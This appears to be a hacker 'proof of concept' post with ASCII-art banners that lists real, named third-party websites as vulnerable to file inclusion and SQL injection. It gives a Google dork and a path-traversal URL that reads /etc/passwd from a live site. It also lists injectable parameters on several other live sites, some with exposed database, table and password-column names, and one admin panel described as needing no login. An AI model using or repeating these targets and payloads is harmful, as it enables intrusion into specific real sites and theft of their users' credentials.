.__ .__ .__ __ ____ __ __| | | | _____|__|/ |_ ____ / \| | \ | | | / ___/ \ __\/ __ \ | | \ | / |_| |__\___ \| || | \ ___/ |___| /____/|____/____/____ >__||__| \___ > \/ \/ \/ nullsite.altervista.org #Author: Emiliano Febbi (*emilianofebbi.1994@gmail.com*) #Web Site Creator => ??? #Dork => [joomla]: /ofc_upload_image.php?name= #CMS => Joomla , FCKeditor , WP #Vulnz => Blind SQLi/SQLi/LFI #Date => 27/04/2023 *PoC* [code] __ __ |__.-----.-----.--------| .---.-. | | _ | _ | | | _ | | |_____|_____|__|__|__|__|___._| |___| ------------------------------------------ #1 #Joomla LFI | #Dork:inurl:/ofc_upload_image.php?name= | #version: ??? | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- https://www.emaths.co.uk/index.php?option=com_content&view=article&id=6:key-stage-5-schemes-of-work&Itemid=510&jsmallfib=1&dir=JSROOT/SchemesOfWork/A Level/administrator/components/com_acymailing/inc/openflash/php-ofc-library//administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=../../../../../../../../../../../../etc/passwd ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- _______ _______ ___ ___ __ __ __ | _ | _ | Y .-----.--| |__| |_.-----.----. |. 1___|. 1___|. 1 /| -__| _ | | _| _ | _| |. __) |. |___|. _ \|_____|_____|__|____|_____|__| |: | |: 1 |: | \ |::.| |::.. . |::.| . ) `---' `-------`--- ---' ------------------------------#2 #FCKeditor Blind SQLi | #version: 2.5.1 - Build 17566 | ---------------------------------------------------------------------- http://www.hollabrasil.com.br/cms/admin/?nav_id=1 <= auth no required | ---------------------------------------------------------------------- http://www.hollabrasil.com.br/cms/admin/?nav_id=1 <= [*Blind SQLi*] | ----------------------------------------------------------------------------------------------------------------------------------------------------- #error: | PHP Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in E:\Home\hollabrasil\Web\cms\inc\class.data.php on line 20 | PHP Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in E:\Home\hollabrasil\Web\cms\inc\class.data.php on line 138 | PHP Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in E:\Home\hollabrasil\Web\cms\admin\index.php on line 147 | | #DB name: "hollabrasil" | .....................................................................................................................................................| ------------------------#Extra 1 #artery found presents: | ------------------------------------------------------------- http://www.eos-ventures.com/project.php?id=7 <= [*SQLi*] | ............................................................. -------------------------------------------------------------#Extra 2 #DB type: MSAccess | http://deepinwood.co.uk/pages/about.asp?Nav_ID=1 <= [*SQLi*] | http://deepinwood.co.uk/pages/myaccount.asp <= bugged | _____________________________________________________________| #tables: | _________| products client => #columns: email , password news ---------------------------------------------------------------------------------------------------------------#Extra 3 https://www.sempreflu.com.br/forum.php?row[forum]=-18&PHPSESSID=e26ab6634b2083fd3ba840b90647f441 <= found??? | --------------------------------------------------------------------------------------------------------------- end artery | -----------#end ___ ___ _______ | Y | _ | |. | |. 1 | |. / \ |. ____| |: |: | |::.|:. |::.| `--- ---`---' -----------#3 #Wordpress | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 1- https://valigeriaserra.it/?id_prodotto=-9193 ; presents error 2- http://www.ravennaincomune.it/wp/index.php/page/77/?cat=-1 ; time based??? 3- https://fbiscience.com/wp/index.php/en/produkte-2/?s=test ; Warning: Constant WP_USE_THEMES already defined in /var/www/vhosts/fbiscience.com/httpdocs/wp/index.php on line 14 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [/code] ._________. */ ///______I ) . /_(_) /__/*PoC End*